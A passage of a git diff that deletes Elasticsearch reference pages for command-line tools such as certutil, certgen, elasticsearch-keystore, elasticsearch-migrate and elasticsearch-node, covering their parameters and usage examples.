-master-eligible nodes. - -For more information, see <>. - -[[voting-config-exclusions-api-query-params]] -==== {api-query-parms-title} - -`node_names`:: -A comma-separated list of the names of the nodes to exclude from the voting -configuration. If specified, you may not also specify `?node_ids`. - -`node_ids`:: -A comma-separated list of the persistent ids of the nodes to exclude from the -voting configuration. If specified, you may not also specify `?node_names`. - -`timeout`:: -(Optional, <>) When adding a voting configuration -exclusion, the API waits for the specified nodes to be excluded from the voting -configuration before returning. The period of time to wait is specified by the -`?timeout` query parameter. If the timeout expires before the appropriate -condition is satisfied, the request fails and returns an error. Defaults to -`30s`. - -`wait_for_removal`:: -(Optional, Boolean) Specifies whether to wait for all excluded nodes to be -removed from the cluster before clearing the voting configuration exclusions -list. Defaults to `true`, meaning that all excluded nodes must be removed from -the cluster before this API takes any action. If set to `false` then the voting -configuration exclusions list is cleared even if some excluded nodes are still -in the cluster. - -[[voting-config-exclusions-api-example]] -==== {api-examples-title} - -Adds nodes named `nodeName1` and `nodeName2` to the voting configuration -exclusions list: - -[source,console] --------------------------------------------------- -POST /_cluster/voting_config_exclusions?node_names=nodeName1,nodeName2 --------------------------------------------------- - -Remove all exclusions from the list: - -[source,console] --------------------------------------------------- -DELETE /_cluster/voting_config_exclusions --------------------------------------------------- diff --git a/docs/reference/commands/certgen.asciidoc b/docs/reference/commands/certgen.asciidoc deleted file mode 100644 index 78f5901312d..00000000000 --- a/docs/reference/commands/certgen.asciidoc +++ /dev/null @@ -1,160 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[certgen]] -== elasticsearch-certgen - -deprecated[6.1,"Replaced by <>."] - -The `elasticsearch-certgen` command simplifies the creation of certificate -authorities (CA), certificate signing requests (CSR), and signed certificates -for use with the Elastic Stack. Though this command is deprecated, you do not -need to replace CAs, CSRs, or certificates that it created. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-certgen -(([--cert ] [--days ] [--dn ] [--key ] -[--keysize ] [--pass ] [--p12 ]) -| [--csr]) -[-E ] [-h, --help] [--in ] [--out ] -([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -By default, the command runs in interactive mode and you are prompted for -information about each instance. An instance is any piece of the Elastic Stack -that requires a Transport Layer Security (TLS) or SSL certificate. Depending on -your configuration, {es}, Logstash, {kib}, and Beats might all require a -certificate and private key. - -The minimum required value for each instance is a name. This can simply be the -hostname, which is used as the Common Name of the certificate. You can also use -a full distinguished name. IP addresses and DNS names are optional. Multiple -values can be specified as a comma separated string. If no IP addresses or DNS -names are provided, you might disable hostname verification in your TLS or SSL -configuration. - -Depending on the parameters that you specify, you are also prompted for -necessary information such as the path for the output file and the CA private -key password. - -The `elasticsearch-certgen` command also supports a silent mode of operation to -enable easier batch operations. For more information, see <>. - -The output file is a zip file that contains the signed certificates and private -keys for each instance. If you chose to generate a CA, which is the default -behavior, the certificate and private key are included in the output file. If -you chose to generate CSRs, you should provide them to your commercial or -organization-specific certificate authority to obtain signed certificates. The -signed certificates must be in PEM format to work with the {stack} -{security-features}. - -[discrete] -[[certgen-parameters]] -=== Parameters - -`--cert `:: Specifies to generate new instance certificates and keys -using an existing CA certificate, which is provided in the `` argument. -This parameter cannot be used with the `-csr` parameter. - -`--csr`:: Specifies to operate in certificate signing request mode. - -`--days `:: -Specifies an integer value that represents the number of days the generated keys -are valid. The default value is `1095`. This parameter cannot be used with the -`-csr` parameter. - -`--dn `:: -Defines the _Distinguished Name_ that is used for the generated CA certificate. -The default value is `CN=Elastic Certificate Tool Autogenerated CA`. -This parameter cannot be used with the `-csr` parameter. - -`-E `:: Configures a setting. - -`-h, --help`:: Returns all of the command parameters. - -`--in `:: Specifies the file that is used to run in silent mode. The -input file must be a YAML file, as described in <>. - -`--key `:: Specifies the _private-key_ file for the CA certificate. -This parameter is required whenever the `-cert` parameter is used. - -`--keysize `:: -Defines the number of bits that are used in generated RSA keys. The default -value is `2048`. - -`--out `:: Specifies a path for the output file. - -`--pass `:: Specifies the password for the CA private key. -If the `-key` parameter is provided, then this is the password for the existing -private key file. Otherwise, it is the password that should be applied to the -generated CA key. This parameter cannot be used with the `-csr` parameter. - -`--p12 `:: -Generate a PKCS#12 (`.p12` or `.pfx`) container file for each of the instance -certificates and keys. The generated file is protected by the supplied password, -which can be blank. This parameter cannot be used with the `-csr` parameter. - -`-s, --silent`:: Shows minimal output. - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -[discrete] -[[certgen-silent]] -==== Using `elasticsearch-certgen` in Silent Mode - -To use the silent mode of operation, you must create a YAML file that contains -information about the instances. It must match the following format: - -[source, yaml] --------------------------------------------------- -instances: - - name: "node1" <1> - ip: <2> - - "192.0.2.1" - dns: <3> - - "node1.mydomain.com" - - name: "node2" - ip: - - "192.0.2.2" - - "198.51.100.1" - - name: "node3" - - name: "node4" - dns: - - "node4.mydomain.com" - - "node4.internal" - - name: "CN=node5,OU=IT,DC=mydomain,DC=com" - filename: "node5" <4> --------------------------------------------------- -<1> The name of the instance. This can be a simple string value or can be a -Distinguished Name (DN). This is the only required field. -<2> An optional array of strings that represent IP Addresses for this instance. -Both IPv4 and IPv6 values are allowed. The values are added as Subject -Alternative Names. -<3> An optional array of strings that represent DNS names for this instance. -The values are added as Subject Alternative Names. -<4> The filename to use for this instance. This name is used as the name of the -directory that contains the instance's files in the output. It is also used in -the names of the files within the directory. This filename should not have an -extension. Note: If the `name` provided for the instance does not represent a -valid filename, then the `filename` field must be present. - -When your YAML file is ready, you can use the `elasticsearch-certgen` command to -generate certificates or certificate signing requests. Simply use the `-in` -parameter to specify the location of the file. For example: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-certgen -in instances.yml --------------------------------------------------- - -This command generates a CA certificate and private key as well as certificates -and private keys for the instances that are listed in the YAML file. diff --git a/docs/reference/commands/certutil.asciidoc b/docs/reference/commands/certutil.asciidoc deleted file mode 100644 index f8735614433..00000000000 --- a/docs/reference/commands/certutil.asciidoc +++ /dev/null @@ -1,313 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[certutil]] -== elasticsearch-certutil - -The `elasticsearch-certutil` command simplifies the creation of certificates for -use with Transport Layer Security (TLS) in the {stack}. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-certutil -( -(ca [--ca-dn ] [--days ] [--pem]) - -| (cert ([--ca ] | [--ca-cert --ca-key ]) -[--ca-dn ] [--ca-pass ] [--days ] -[--dns ] [--in ] [--ip ] -[--keep-ca-key] [--multiple] [--name ] [--pem]) - -| (csr [--dns ] [--in ] [--ip ] -[--name ]) - -[-E ] [--keysize ] [--out ] -[--pass ] -) - -| http - -[-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -You can specify one of the following modes: `ca`, `cert`, `csr`, `http`. The -`elasticsearch-certutil` command also supports a silent mode of operation to -enable easier batch operations. - -[discrete] -[[certutil-ca]] -==== CA mode - -The `ca` mode generates a new certificate authority (CA). By default, it -produces a single PKCS#12 output file, which holds the CA certificate and the -private key for the CA. If you specify the `--pem` parameter, the command -generates a zip file, which contains the certificate and private key in PEM -format. - -You can subsequently use these files as input for the `cert` mode of the command. - -[discrete] -[[certutil-cert]] -==== CERT mode - -The `cert` mode generates X.509 certificates and private keys. By default, it -produces a single certificate and key for use on a single instance. - -To generate certificates and keys for multiple instances, specify the -`--multiple` parameter, which prompts you for details about each instance. -Alternatively, you can use the `--in` parameter to specify a YAML file that -contains details about the instances. - -An instance is any piece of the Elastic Stack that requires a TLS or SSL -certificate. Depending on your configuration, {es}, Logstash, {kib}, and Beats -might all require a certificate and private key. The minimum required -information for an instance is its name, which is used as the common name for -the certificate. The instance name can be a hostname value or a full -distinguished name. If the instance name would result in an invalid file or -directory name, you must also specify a file name in the `--name` command -parameter or in the `filename` field in an input YAML file. - -You can optionally provide IP addresses or DNS names for each instance. If -neither IP addresses nor DNS names are specified, the Elastic stack products -cannot perform hostname verification and you might need to configure the -`verification_mode` security setting to `certificate` only. For more information -about this setting, see <>. - -All certificates that are generated by this command are signed by a CA. You can -provide your own CA with the `--ca` or `--ca-cert` parameters. Otherwise, the -command automatically generates a new CA for you. For more information about -generating a CA, see the <>. - -By default, the `cert` mode produces a single PKCS#12 output file which holds -the instance certificate, the instance private key, and the CA certificate. If -you specify the `--pem` parameter, the command generates PEM formatted -certificates and keys and packages them into a zip file. -If you specify the `--keep-ca-key`, `--multiple` or `--in` parameters, -the command produces a zip file containing the generated certificates and keys. - -[discrete] -[[certutil-csr]] -==== CSR mode - -The `csr` mode generates certificate signing requests (CSRs) that you can send -to a trusted certificate authority to obtain signed certificates. The signed -certificates must be in PEM or PKCS#12 format to work with {es} -{security-features}. - -By default, the command produces a single CSR for a single instance. - -To generate CSRs for multiple instances, specify the `--multiple` parameter, -which prompts you for details about each instance. Alternatively, you can use -the `--in` parameter to specify a YAML file that contains details about the -instances. - -The `csr` mode produces a single zip file which contains the CSRs and the -private keys for each instance. Each CSR is provided as a standard PEM -encoding of a PKCS#10 CSR. Each key is provided as a PEM encoding of an RSA -private key. - -[discrete] -[[certutil-http]] -==== HTTP mode - -The `http` mode guides you through the process of generating certificates for -use on the HTTP (REST) interface for {es}. It asks you a number of questions in -order to generate the right set of files for your needs. For example, depending -on your choices, it might generate a zip file that contains a certificate -authority (CA), a certificate signing request (CSR), or certificates and keys -for use in {es} and {kib}. Each folder in the zip file contains a readme that -explains how to use the files. - -[discrete] -[[certutil-parameters]] -=== Parameters - -`ca`:: Specifies to generate a new local certificate authority (CA). This -parameter cannot be used with the `csr` or `cert` parameters. - -`cert`:: Specifies to generate new X.509 certificates and keys. -This parameter cannot be used with the `csr` or `ca` parameters. - -`csr`:: Specifies to generate certificate signing requests. This parameter -cannot be used with the `ca` or `cert` parameters. - -`http`:: Generates a new certificate or certificate request for the {es} HTTP -interface. - -`--ca `:: Specifies the path to an existing CA key pair -(in PKCS#12 format). This parameter cannot be used with the `ca` or `csr` parameters. - -`--ca-cert `:: Specifies the path to an existing CA certificate (in -PEM format). You must also specify the `--ca-key` parameter. The `--ca-cert` -parameter cannot be used with the `ca` or `csr` parameters. - -`--ca-dn `:: Defines the _Distinguished Name_ (DN) that is used for the -generated CA certificate. The default value is -`CN=Elastic Certificate Tool Autogenerated CA`. This parameter cannot be used -with the `csr` parameter. - -`--ca-key `:: Specifies the path to an existing CA private key (in -PEM format). You must also specify the `--ca-cert` parameter. The `--ca-key` -parameter cannot be used with the `ca` or `csr` parameters. - -`--ca-pass `:: Specifies the password for an existing CA private key -or the generated CA private key. This parameter cannot be used with the `ca` or -`csr` parameters. - -`--days `:: Specifies an integer value that represents the number of days the -generated certificates are valid. The default value is `1095`. This parameter -cannot be used with the `csr` parameter. - -`--dns `:: Specifies a comma-separated list of DNS names. This -parameter cannot be used with the `ca` parameter. - -`-E `:: Configures a setting. - -`-h, --help`:: Returns all of the command parameters. - -`--in `:: Specifies the file that is used to run in silent mode. The -input file must be a YAML file. This parameter cannot be used with the `ca` -parameter. - -`--ip `:: Specifies a comma-separated list of IP addresses. This -parameter cannot be used with the `ca` parameter. - -`--keep-ca-key`:: When running in `cert` mode with an automatically-generated -CA, specifies to retain the CA private key for future use. - -`--keysize `:: -Defines the number of bits that are used in generated RSA keys. The default -value is `2048`. - -`--multiple`:: -Specifies to generate files for multiple instances. This parameter cannot be -used with the `ca` parameter. - -`--name `:: -Specifies the name of the generated certificate. This parameter cannot be used -with the `ca` parameter. - -`--out `:: Specifies a path for the output files. - -`--pass `:: Specifies the password for the generated private keys. -+ -Keys stored in PKCS#12 format are always password protected, however, -this password may be _blank_. If you want to specify a blank password -without a prompt, use `--pass ""` (with no `=`) on the command line. -+ -Keys stored in PEM format are password protected only if the -`--pass` parameter is specified. If you do not supply an argument for the -`--pass` parameter, you are prompted for a password. -Encrypted PEM files do not support blank passwords (if you do not -wish to password-protect your PEM keys, then do not specify -`--pass`). - - -`--pem`:: Generates certificates and keys in PEM format instead of PKCS#12. This -parameter cannot be used with the `csr` parameter. - -`-s, --silent`:: Shows minimal output. - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -The following command generates a CA certificate and private key in PKCS#12 -format: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-certutil ca --------------------------------------------------- - -You are prompted for an output filename and a password. Alternatively, you can -specify the `--out` and `--pass` parameters. - -You can then generate X.509 certificates and private keys by using the new -CA. For example: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-certutil cert --ca elastic-stack-ca.p12 --------------------------------------------------- - -You are prompted for the CA password and for an output filename and password. -Alternatively, you can specify the `--ca-pass`, `--out`, and `--pass` parameters. - -By default, this command generates a file called `elastic-certificates.p12`, -which you can copy to the relevant configuration directory for each Elastic -product that you want to configure. For more information, see -<>. - -[discrete] -[[certutil-silent]] -==== Using `elasticsearch-certutil` in Silent Mode - -To use the silent mode of operation, you must create a YAML file that contains -information about the instances. It must match the following format: - -[source, yaml] --------------------------------------------------- -instances: - - name: "node1" <1> - ip: <2> - - "192.0.2.1" - dns: <3> - - "node1.mydomain.com" - - name: "node2" - ip: - - "192.0.2.2" - - "198.51.100.1" - - name: "node3" - - name: "node4" - dns: - - "node4.mydomain.com" - - "node4.internal" - - name: "CN=node5,OU=IT,DC=mydomain,DC=com" - filename: "node5" <4> --------------------------------------------------- -<1> The name of the instance. This can be a simple string value or can be a -Distinguished Name (DN). This is the only required field. -<2> An optional array of strings that represent IP Addresses for this instance. -Both IPv4 and IPv6 values are allowed. The values are added as Subject -Alternative Names. -<3> An optional array of strings that represent DNS names for this instance. -The values are added as Subject Alternative Names. -<4> The filename to use for this instance. This name is used as the name of the -directory that contains the instance's files in the output. It is also used in -the names of the files within the directory. This filename should not have an -extension. Note: If the `name` provided for the instance does not represent a -valid filename, then the `filename` field must be present. - -When your YAML file is ready, you can use the `elasticsearch-certutil` command -to generate certificates or certificate signing requests. Simply use the `--in` -parameter to specify the location of the file. For example: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-certutil cert --silent --in instances.yml --out test1.zip --pass testpassword --keep-ca-key --------------------------------------------------- - -This command generates a compressed `test1.zip` file. After you decompress the -output file, there is a directory for each instance that was listed in the -`instances.yml` file. Each instance directory contains a single PKCS#12 (`.p12`) -file, which contains the instance certificate, instance private key, and CA -certificate. - -You an also use the YAML file to generate certificate signing requests. For -example: - -[source, sh] --------------------------------------------------- -bin/elasticsearch-certutil csr --silent --in instances.yml --out test2.zip --pass testpassword --------------------------------------------------- - -This command generates a compressed file, which contains a directory for each -instance. Each instance directory contains a certificate signing request -(`*.csr` file) and private key (`*.key` file). diff --git a/docs/reference/commands/croneval.asciidoc b/docs/reference/commands/croneval.asciidoc deleted file mode 100644 index f066444e3bb..00000000000 --- a/docs/reference/commands/croneval.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[elasticsearch-croneval]] -== elasticsearch-croneval - -Validates and evaluates a <>. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-croneval -[-c, --count ] [-h, --help] -([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -This command enables you to verify that your -cron expressions are valid for use with -{es} and produce the expected results. - -This command is provided in the `$ES_HOME/bin` directory. - -[discrete] -[[elasticsearch-croneval-parameters]] -=== Parameters - -`-c, --count` :: - The number of future times this expression will be triggered. The default - value is `10`. - -`-d, --detail`:: - Shows detail for invalid cron expression. It will print the stacktrace if the - expression is not valid. - -`-h, --help`:: - Returns all of the command parameters. - -`-s, --silent`:: - Shows minimal output. - -`-v, --verbose`:: - Shows verbose output. - -[discrete] -=== Example - -If the cron expression is valid, the following command displays the next -20 times that the schedule will be triggered: - -[source,bash] --------------------------------------------------- -bin/elasticsearch-croneval "0 0/1 * * * ?" -c 20 --------------------------------------------------- diff --git a/docs/reference/commands/index.asciidoc b/docs/reference/commands/index.asciidoc deleted file mode 100644 index 70cc6261e74..00000000000 --- a/docs/reference/commands/index.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ -[[commands]] -= Command line tools - -[partintro] --- - -{es} provides the following tools for configuring security and performing other -tasks from the command line: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - --- - -include::certgen.asciidoc[] -include::certutil.asciidoc[] -include::croneval.asciidoc[] -include::keystore.asciidoc[] -include::migrate-tool.asciidoc[] -include::node-tool.asciidoc[] -include::saml-metadata.asciidoc[] -include::setup-passwords.asciidoc[] -include::shard-tool.asciidoc[] -include::syskeygen.asciidoc[] -include::users-command.asciidoc[] diff --git a/docs/reference/commands/keystore.asciidoc b/docs/reference/commands/keystore.asciidoc deleted file mode 100644 index b3d178a99b3..00000000000 --- a/docs/reference/commands/keystore.asciidoc +++ /dev/null @@ -1,233 +0,0 @@ -[[elasticsearch-keystore]] -== elasticsearch-keystore - -The `elasticsearch-keystore` command manages <> -in the {es} keystore. - -[discrete] -[[elasticsearch-keystore-synopsis]] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-keystore -([add ] [-f] [--stdin] | -[add-file ( )+] | [create] [-p] | -[list] | [passwd] | [remove ] | [upgrade]) -[-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -[[elasticsearch-keystore-description]] -=== Description - -IMPORTANT: This command should be run as the user that will run {es}. - -Currently, all secure settings are node-specific settings that must have the -same value on every node. Therefore you must run this command on every node. - -When the keystore is password-protected, you must supply the password each time -{es} starts. - -Modifications to the keystore do not take effect until you restart {es}. - -Only some settings are designed to be read from the keystore. However, there -is no validation to block unsupported settings from the keystore and they can -cause {es} to fail to start. To see whether a setting is supported in the -keystore, see the setting reference. - -[discrete] -[[elasticsearch-keystore-parameters]] -=== Parameters - -`add `:: Adds settings to the keystore. Multiple setting names can be -specified as arguments to the `add` command. By default, you are prompted for -the values of the settings. If the keystore is password protected, you are also -prompted to enter the password. If a setting already exists in the keystore, you -must confirm that you want to overwrite the current value. If the keystore does -not exist, you must confirm that you want to create a keystore. To avoid these -two confirmation prompts, use the `-f` parameter. - -`add-file ( )+`:: Adds files to the keystore. - -`create`:: Creates the keystore. - -`-f, --force`:: When used with the `add` parameter, the command no longer prompts you -before overwriting existing entries in the keystore. Also, if you haven't -created a keystore yet, it creates a keystore that is obfuscated but not -password protected. - -`-h, --help`:: Returns all of the command parameters. - -`list`:: Lists the settings in the keystore. If the keystore is password -protected, you are prompted to enter the password. - -`-p`:: When used with the `create` parameter, the command prompts you to enter a -keystore password. If you don't specify the `-p` flag or if you enter an empty -password, the keystore is obfuscated but not password protected. - -`passwd`:: Changes or sets the keystore password. If the keystore is password -protected, you are prompted to enter the current password and the new one. You -can optionally use an empty string to remove the password. If the keystore is -not password protected, you can use this command to set a password. - -`remove `:: Removes settings from the keystore. Multiple setting -names can be specified as arguments to the `remove` command. - -`-s, --silent`:: Shows minimal output. - -`-x, --stdin`:: When used with the `add` parameter, you can pass the settings values -through standard input (stdin). Separate multiple values with carriage returns -or newlines. See <>. - -`upgrade`:: Upgrades the internal format of the keystore. - -`-v, --verbose`:: Shows verbose output. - -[discrete] -[[elasticsearch-keystore-examples]] -=== Examples - -[discrete] -[[creating-keystore]] -==== Create the keystore - -To create the `elasticsearch.keystore`, use the `create` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore create -p ----------------------------------------------------------------- - -You are prompted to enter the keystore password. A password-protected -`elasticsearch.keystore` file is created alongside the `elasticsearch.yml` file. - -[discrete] -[[changing-keystore-password]] -==== Change the password of the keystore - -To change the password of the `elasticsearch.keystore`, use the `passwd` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore passwd ----------------------------------------------------------------- - -If the {es} keystore is password protected, you are prompted to enter the -current password and then enter the new one. If it is not password protected, -you are prompted to set a password. - -[discrete] -[[list-settings]] -==== List settings in the keystore - -To list the settings in the keystore, use the `list` command. - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore list ----------------------------------------------------------------- - -If the {es} keystore is password protected, you are prompted to enter the -password. - -[discrete] -[[add-string-to-keystore]] -==== Add settings to the keystore - -Sensitive string settings, like authentication credentials for Cloud plugins, -can be added with the `add` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add the.setting.name.to.set ----------------------------------------------------------------- - -You are prompted to enter the value of the setting. If the {es} keystore is -password protected, you are also prompted to enter the password. - -You can also add multiple settings with the `add` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add \ - the.setting.name.to.set \ - the.other.setting.name.to.set ----------------------------------------------------------------- - -You are prompted to enter the values of the settings. If the {es} keystore is -password protected, you are also prompted to enter the password. - -To pass the settings values through standard input (stdin), use the `--stdin` -flag: - -[source,sh] ----------------------------------------------------------------- -cat /file/containing/setting/value | bin/elasticsearch-keystore add --stdin the.setting.name.to.set ----------------------------------------------------------------- - -Values for multiple settings must be separated by carriage returns or newlines. - -[discrete] -[[add-file-to-keystore]] -==== Add files to the keystore - -You can add sensitive files, like authentication key files for Cloud plugins, -using the `add-file` command. Settings and file paths are specified in pairs -consisting of `setting path`. - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add-file the.setting.name.to.set /path/example-file.json ----------------------------------------------------------------- - -You can add multiple files with the `add-file` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore add-file \ - the.setting.name.to.set /path/example-file.json \ - the.other.setting.name.to.set /path/other-example-file.json ----------------------------------------------------------------- - -If the {es} keystore is password protected, you are prompted to enter the -password. - -[discrete] -[[remove-settings]] -==== Remove settings from the keystore - -To remove a setting from the keystore, use the `remove` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore remove the.setting.name.to.remove ----------------------------------------------------------------- - -You can also remove multiple settings with the `remove` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore remove \ - the.setting.name.to.remove \ - the.other.setting.name.to.remove ----------------------------------------------------------------- - -If the {es} keystore is password protected, you are prompted to enter the -password. - -[discrete] -[[keystore-upgrade]] -==== Upgrade the keystore - -Occasionally, the internal format of the keystore changes. When {es} is -installed from a package manager, an upgrade of the on-disk keystore to the new -format is done during package upgrade. In other cases, {es} performs the upgrade -during node startup. This requires that {es} has write permissions to the -directory that contains the keystore. Alternatively, you can manually perform -such an upgrade by using the `upgrade` command: - -[source,sh] ----------------------------------------------------------------- -bin/elasticsearch-keystore upgrade ----------------------------------------------------------------- diff --git a/docs/reference/commands/migrate-tool.asciidoc b/docs/reference/commands/migrate-tool.asciidoc deleted file mode 100644 index f4e4d5d403c..00000000000 --- a/docs/reference/commands/migrate-tool.asciidoc +++ /dev/null @@ -1,112 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[migrate-tool]] -== elasticsearch-migrate - -deprecated:[7.2.0, "This tool is deprecated. Use the native realm directly."] - -The `elasticsearch-migrate` command migrates existing file-based users and roles -to the native realm. From 5.0 onward, you should use the `native` realm to -manage roles and local users. - - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-migrate -(native (-U, --url ) -[-h, --help] [-E ] -[-n, --users ] [-r, --roles ] -[-u, --username ] [-p, --password ] -[-s, --silent] [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -NOTE: When migrating from Shield 2.x, the `elasticsearch-migrate` tool should be -run prior to upgrading to ensure all roles can be migrated as some may be in a -deprecated format that {xpack} cannot read. The `migrate` tool is available in -Shield 2.4.0 and higher. - -The `elasticsearch-migrate` tool loads the existing file-based users and roles -and calls the user and roles APIs to add them to the native realm. You can -migrate all users and roles, or specify the ones you want to migrate. Users and -roles that already exist in the `native` realm are not replaced or -overridden. If the names you specify with the `--users` and `--roles` options -don't exist in the `file` realm, they are skipped. - -[discrete] -[[migrate-tool-options]] -=== Parameters -The `native` subcommand supports the following options: - -`-E `:: -Configures a setting. - -`-h, --help`:: -Returns all of the command parameters. - -`-n`, `--users`:: -Comma-separated list of the users that you want to migrate. If this parameter is -not specified, all users are migrated. - -`-p`, `--password`:: -Password to use for authentication with {es}. -//TBD: What is the default if this isn't specified? - -`-r`, `--roles`:: -Comma-separated list of the roles that you want to migrate. If this parameter is -not specified, all roles are migrated. - -`-s, --silent`:: Shows minimal output. - -`-U`, `--url`:: -Endpoint URL of the {es} cluster to which you want to migrate the -file-based users and roles. This parameter is required. - -`-u`, `--username`:: -Username to use for authentication with {es}. -//TBD: What is the default if this isn't specified? - -`-v, --verbose`:: Shows verbose output. - -[discrete] -=== Examples - -Run the `elasticsearch-migrate` tool when {xpack} is installed. For example: - -[source, sh] ----------------------------------------------------------------------- -$ bin/elasticsearch-migrate native -U http://localhost:9200 -u elastic --p x-pack-test-password -n lee,foo -r role1,role2,role3,role4,foo -starting migration of users and roles... -importing users from [/home/es/config/shield/users]... -found existing users: [test_user, joe3, joe2] -migrating user [lee] -{"user":{"created":true}} -no user [foo] found, skipping -importing roles from [/home/es/config/shield/roles.yml]... -found existing roles: [marvel_user, role_query_fields, admin_role, role3, admin, -remote_marvel_agent, power_user, role_new_format_name_array, role_run_as, -logstash, role_fields, role_run_as1, role_new_format, kibana4_server, user, -transport_client, role1.ab, role_query] -migrating role [role1] -{"role":{"created":true}} -migrating role [role2] -{"role":{"created":true}} -role [role3] already exists, skipping -no role [foo] found, skipping -users and roles imported. ----------------------------------------------------------------------- - -Additionally, the `-E` flag can be used to specify additional settings. For example -to specify a different configuration directory, the command would look like: - -[source, sh] ----------------------------------------------------------------------- -$ bin/elasticsearch-migrate native -U http://localhost:9200 -u elastic --p x-pack-test-password -E path.conf=/etc/elasticsearch ----------------------------------------------------------------------- diff --git a/docs/reference/commands/node-tool.asciidoc b/docs/reference/commands/node-tool.asciidoc deleted file mode 100644 index 78bae263986..00000000000 --- a/docs/reference/commands/node-tool.asciidoc +++ /dev/null @@ -1,592 +0,0 @@ -[[node-tool]] -== elasticsearch-node - -The `elasticsearch-node` command enables you to perform certain unsafe -operations on a node that are only possible while it is shut down. This command -allows you to adjust the <> of a node, unsafely edit cluster -settings and may be able to recover some data after a disaster or start a node -even if it is incompatible with the data on disk. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-node repurpose|unsafe-bootstrap|detach-cluster|override-version - [--ordinal ] [-E ] - [-h, --help] ([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -This tool has a number of modes: - -* `elasticsearch-node repurpose` can be used to delete unwanted data from a - node if it used to be a <> or a - <> but has been repurposed not to have one - or other of these roles. - -* `elasticsearch-node remove-settings` can be used to remove persistent settings - from the cluster state in case where it contains incompatible settings that - prevent the cluster from forming. - -* `elasticsearch-node remove-customs` can be used to remove custom metadata - from the cluster state in case where it contains broken metadata that - prevents the cluster state from being loaded. - -* `elasticsearch-node unsafe-bootstrap` can be used to perform _unsafe cluster - bootstrapping_. It forces one of the nodes to form a brand-new cluster on - its own, using its local copy of the cluster metadata. - -* `elasticsearch-node detach-cluster` enables you to move nodes from one - cluster to another. This can be used to move nodes into a new cluster - created with the `elasticsearch-node unsafe-bootstrap` command. If unsafe - cluster bootstrapping was not possible, it also enables you to move nodes - into a brand-new cluster. - -* `elasticsearch-node override-version` enables you to start up a node - even if the data in the data path was written by an incompatible version of - {es}. This may sometimes allow you to downgrade to an earlier version of - {es}. - -[[node-tool-repurpose]] -[discrete] -==== Changing the role of a node - -There may be situations where you want to repurpose a node without following -the <>. The `elasticsearch-node -repurpose` tool allows you to delete any excess on-disk data and start a node -after repurposing it. - -The intended use is: - -* Stop the node -* Update `elasticsearch.yml` by setting `node.roles` as desired. -* Run `elasticsearch-node repurpose` on the node -* Start the node - -If you run `elasticsearch-node repurpose` on a node without the `data` role and -with the `master` role then it will delete any remaining shard data on that -node, but it will leave the index and cluster metadata alone. If you run -`elasticsearch-node repurpose` on a node without the `data` and `master` roles -then it will delete any remaining shard data and index metadata, but it will -leave the cluster metadata alone. - -[WARNING] -Running this command can lead to data loss for the indices mentioned if the -data contained is not available on other nodes in the cluster. Only run this -tool if you understand and accept the possible consequences, and only after -determining that the node cannot be repurposed cleanly. - -The tool provides a summary of the data to be deleted and asks for confirmation -before making any changes. You can get detailed information about the affected -indices and shards by passing the verbose (`-v`) option. - -[discrete] -==== Removing persistent cluster settings - -There may be situations where a node contains persistent cluster -settings that prevent the cluster from forming. Since the cluster cannot form, -it is not possible to remove these settings using the -<> API. - -The `elasticsearch-node remove-settings` tool allows you to forcefully remove -those persistent settings from the on-disk cluster state. The tool takes a -list of settings as parameters that should be removed, and also supports -wildcard patterns. - -The intended use is: - -* Stop the node -* Run `elasticsearch-node remove-settings name-of-setting-to-remove` on the node -* Repeat for all other master-eligible nodes -* Start the nodes - -[discrete] -==== Removing custom metadata from the cluster state - -There may be situations where a node contains custom metadata, typically -provided by plugins, that prevent the node from starting up and loading -the cluster from disk. - -The `elasticsearch-node remove-customs` tool allows you to forcefully remove -the problematic custom metadata. The tool takes a list of custom metadata names -as parameters that should be removed, and also supports wildcard patterns. - -The intended use is: - -* Stop the node -* Run `elasticsearch-node remove-customs name-of-custom-to-remove` on the node -* Repeat for all other master-eligible nodes -* Start the nodes - -[discrete] -==== Recovering data after a disaster - -Sometimes {es} nodes are temporarily stopped, perhaps because of the need to -perform some maintenance activity or perhaps because of a hardware failure. -After you resolve the temporary condition and restart the node, -it will rejoin the cluster and continue normally. Depending on your -configuration, your cluster may be able to remain completely available even -while one or more of its nodes are stopped. - -Sometimes it might not be possible to restart a node after it has stopped. For -example, the node's host may suffer from a hardware problem that cannot be -repaired. If the cluster is still available then you can start up a fresh node -on another host and {es} will bring this node into the cluster in place of the -failed node. 